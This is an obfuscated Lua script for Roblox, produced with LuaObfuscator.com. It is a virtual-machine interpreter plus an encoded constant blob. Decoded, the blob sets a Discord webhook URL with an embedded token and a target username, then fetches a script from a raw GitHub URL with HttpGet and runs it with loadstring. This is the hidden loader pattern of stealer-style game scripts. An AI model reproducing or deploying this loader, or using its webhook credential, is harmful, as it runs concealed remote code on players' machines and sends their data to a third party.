--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v82,v19);v19=nil;v97=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==((1637 -(1523 + 114)) -0)) then v84=(v31/((3 -1)^(v32-((2 + 0) -(1 -0)))))%((621 -(555 + (1129 -(68 + 997))))^(((v33-((2202 -(226 + 1044)) -(857 + 74))) -(v32-(569 -(367 + 201)))) + 1)) ;return v84-(v84%(928 -(214 + 713))) ;end end else local v85=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and 1) or (877 -(282 + 595)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=(0 -0) -0 ;local v36;local v37;while true do if (v35==(118 -(32 + 85))) then return (v37 * (251 + 5)) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (1 -0) + 1 ;v35=958 -(892 + 65) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + ((136 + 48) -(67 + 113)) ;return (v41 * (12302277 + 4474939)) + (v40 * (160901 -95365)) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=3 -2 ;local v45=(v20(v43,3 -2 ,972 -(802 + 65 + 85) ) * ((5 -3)^(57 -25))) + v42 ;local v46=v20(v43,16 + 5 ,1028 -(915 + 82) );local v47=((v20(v43,90 -58 )==(1 + 0)) and  -(1 -0)) or (1188 -(1069 + (208 -90))) ;if (v46==(0 -(0 -0))) then if (v45==(438 -(145 + 293))) then return v47 * (0 -(430 -(44 + 386))) ;else v46=1 + 0 ;v44=0 -0 ;end elseif (v46==(2031 + (458 -(416 + 26)))) then return ((v45==0) and (v47 * (1/0))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -(368 + 423)) ) * (v44 + (v45/((6 -4)^(70 -(10 + (1494 -(998 + 488))))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v64=1 + 0 , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;while true do local v66=529 -(406 + 123) ;while true do if (v66~=(1 -0)) then else if (v51~=(2 -1)) then else local v94=0 + 0 ;while true do if (v94~=(0 + 0)) then else v55={v52,v53,nil,v54};v56=v23();v94=2 -1 ;end if (v94==(2 -1)) then v57={};v51=2;break;end end end if (2==v51) then local v95=0 -0 ;while true do if (v95==(1 + 0)) then for v102=1901 -(106 + 1794) ,v23() do local v103=0 -0 ;local v104;local v105;while true do if ((0 + 0)==v103) then v104=0 + 0 ;v105=nil;v103=3 -2 ;end if (v103==(868 -(550 + 317))) then while true do if (v104==0) then v105=v21();if (v20(v105,1 -0 ,1 -0 )~=0) then else local v169=0;local v170;local v171;local v172;local v173;local v174;while true do if (v169==(0 -0)) then v170=114 -(4 + 110) ;v171=nil;v169=1;end if ((2 -1)~=v169) then else v172=nil;v173=nil;v169=287 -(134 + 151) ;end if (v169==(1667 -(970 + 695))) then v174=nil;while true do if (v170~=(1428 -(41 + 1386))) then else v173=nil;v174=nil;v170=3 -1 ;end if ((0 + 0)==v170) then local v176=0;while true do if (v176==(1991 -(582 + 1408))) then v170=3 -2 ;break;end if (v176~=0) then else v171=0 -0 ;v172=nil;v176=2 -1 ;end end end if ((168 -(122 + 44))~=v170) then else while true do if (v171~=(3 -2)) then else local v177=1824 -(1195 + 629) ;local v178;while true do if ((0 -0)~=v177) then else v178=241 -(187 + 54) ;while true do if (v178==(0 + 0)) then v174={v22(),v22(),nil,nil};if (v172==(0 + 0)) then local v186=0;local v187;local v188;while true do if (v186==(1257 -(1043 + 214))) then v187=0 -0 ;v188=nil;v186=1213 -(323 + 889) ;end if ((2 -1)==v186) then while true do if (v187==0) then v188=580 -(361 + 219) ;while true do if (v188==(0 + 0)) then v174[2 + 1 ]=v22();v174[8 -4 ]=v22();break;end end break;end end break;end end elseif (v172==(1 -0)) then v174[1 + 2 ]=v23();elseif (v172==(415 -(15 + 398))) then v174[3]=v23() -((1638 -(1373 + 263))^(998 -(18 + 964))) ;elseif (v172~=(11 -8)) then else local v195=1000 -(451 + 549) ;local v196;local v197;while true do if (v195==(0 + 0)) then v196=0 -0 ;v197=nil;v195=1 -0 ;end if (v195==(1385 -(746 + 638))) then while true do if ((0 + 0)~=v196) then else v197=0;while true do if (v197==(126 -(116 + 10))) then v174[4 -1 ]=v23() -((343 -(218 + 123))^(754 -(542 + 196))) ;v174[4]=v22();break;end end break;end end break;end end end v178=1 -0 ;end if (v178==(1582 -(1535 + 46))) then v171=2;break;end end break;end end end if (v171==(1 + 1)) then local v179=0 + 0 ;local v180;while true do if (v179==(0 + 0)) then v180=0 -0 ;while true do if (v180~=1) then else v171=7 -4 ;break;end if (v180==(1551 -(1126 + 425))) then local v185=0 + 0 ;while true do if ((3 -2)~=v185) then else v180=1122 -(118 + 1003) ;break;end if (v185~=(0 -0)) then else if (v20(v173,561 -(306 + 254) ,1 + 0 )~=(1 -0)) then else v174[2]=v57[v174[1469 -(899 + 568) ]];end if (v20(v173,2 + 0 ,2)==1) then v174[7 -4 ]=v57[v174[606 -(268 + 335) ]];end v185=978 -(553 + 424) ;end end end end break;end end end if (v171==(290 -(60 + 230))) then local v181=0;while true do if ((1 + 0)==v181) then v171=1;break;end if (v181==0) then v172=v20(v105,2 + 0 ,3);v173=v20(v105,576 -(426 + 146) ,1 + 5 );v181=1 + 0 ;end end end if (v171==(1459 -(282 + 1174))) then if (v20(v173,814 -(569 + 242) ,2 + 1 )~=(2 -1)) then else v174[11 -7 ]=v57[v174[1 + 3 ]];end v52[v102]=v174;break;end end break;end end break;end end end break;end end break;end end end v51=1027 -(706 + 318) ;break;end if (v95~=(1251 -(721 + 530))) then else local v101=0;while true do if ((1271 -(945 + 326))==v101) then for v110=1 + 0 ,v56 do local v111=0 -0 ;local v112;local v113;while true do if (v111~=(0 -0)) then else local v154=0;local v155;while true do if (v154==(0 + 0)) then v155=1329 -(797 + 532) ;while true do if (v155~=(701 -(271 + 429))) then else v111=1 + 0 ;break;end if (v155==0) then local v175=1500 -(1408 + 92) ;while true do if (v175==0) then v112=v21();v113=nil;v175=1;end if (v175==(1 + 0)) then v155=2 -1 ;break;end end end end break;end end end if (v111==(1203 -(373 + 829))) then if (v112==(732 -(476 + 255))) then v113=v21()~=0 ;elseif (v112==(1088 -(461 + 625))) then v113=v24();elseif (v112~=(1291 -(993 + 295))) then else v113=v25();end v57[v110]=v113;break;end end end v55[1133 -(369 + 761) ]=v21();v101=1 + 0 ;end if (1==v101) then v95=1172 -(418 + 753) ;break;end end end end end break;end if ((0 + 0)==v66) then if (v51==0) then local v96=0;while true do if (v96==(0 + 0)) then v52={};v53={};v96=1;end if (v96~=1) then else v54={};v51=1;break;end end end if (v51==3) then for v99=1 + 0 ,v23() do v53[v99-1 ]=v28();end return v55;end v66=1 + 0 ;end end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v67=v61;local v68=v62;local v69=v63;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v87=0;while true do if (v87==1) then if (v80<=5) then if (v80<=2) then if (v80<=0) then v71=v79[3];elseif (v80==1) then local v114=0;while true do if (2==v114) then v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v114=3;end if (3==v114) then v71=v79[3];break;end if (v114==1) then v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v114=2;end if (v114==0) then v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v60[v79[3]];v114=1;end end else v77[v79[2]]=v60[v79[3]];end elseif (v80<=3) then v77[v79[2]]=v79[3];elseif (v80>4) then v77[v79[2]]=v79[3]~=0 ;else do return;end end elseif (v80<=8) then if (v80<=6) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80==7) then local v119=v79[2];v77[v119]=v77[v119](v13(v77,v119 + 1 ,v72));else local v121=v79[2];local v122=v77[v79[3]];v77[v121 + 1 ]=v122;v77[v121]=v122[v79[4]];end elseif (v80<=10) then if (v80==9) then v77[v79[2]]();else v77[v79[2]][v79[3]]=v79[4];end elseif (v80==11) then local v128=v79[2];local v129,v130=v70(v77[v128](v13(v77,v128 + 1 ,v79[3])));v72=(v130 + v128) -1 ;local v131=0;for v148=v128,v72 do v131=v131 + 1 ;v77[v148]=v129[v131];end else local v132;local v133,v134;local v135;local v136;v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v60[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v60[v79[3]];v71=v71 + 1 ;v79=v67[v71];v136=v79[2];v135=v77[v79[3]];v77[v136 + 1 ]=v135;v77[v136]=v135[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v71=v71 + 1 ;v79=v67[v71];v136=v79[2];v133,v134=v70(v77[v136](v13(v77,v136 + 1 ,v79[3])));v72=(v134 + v136) -1 ;v132=0;for v151=v136,v72 do v132=v132 + 1 ;v77[v151]=v133[v132];end v71=v71 + 1 ;v79=v67[v71];v136=v79[2];v77[v136]=v77[v136](v13(v77,v136 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];end v71=v71 + 1 ;break;end if (v87==0) then v79=v67[v71];v80=v79[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31323037383230333233303631373632302F772O71365174367451334B55532D7A683276647939355F4F595A3944716C72423171474D6869454E364D43447159344249385651734D5A7059536F72667757742O39794D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303083O00557365724E616D6503053O00416D31306F03093O00557365724E616D653200173O0012033O00013O0026063O000E0001000200044O000E0001001202000100033O00300C00010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026063O00010001000100044O00010001001202000100033O0030010001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O00043O00017O00",v9(),...);end
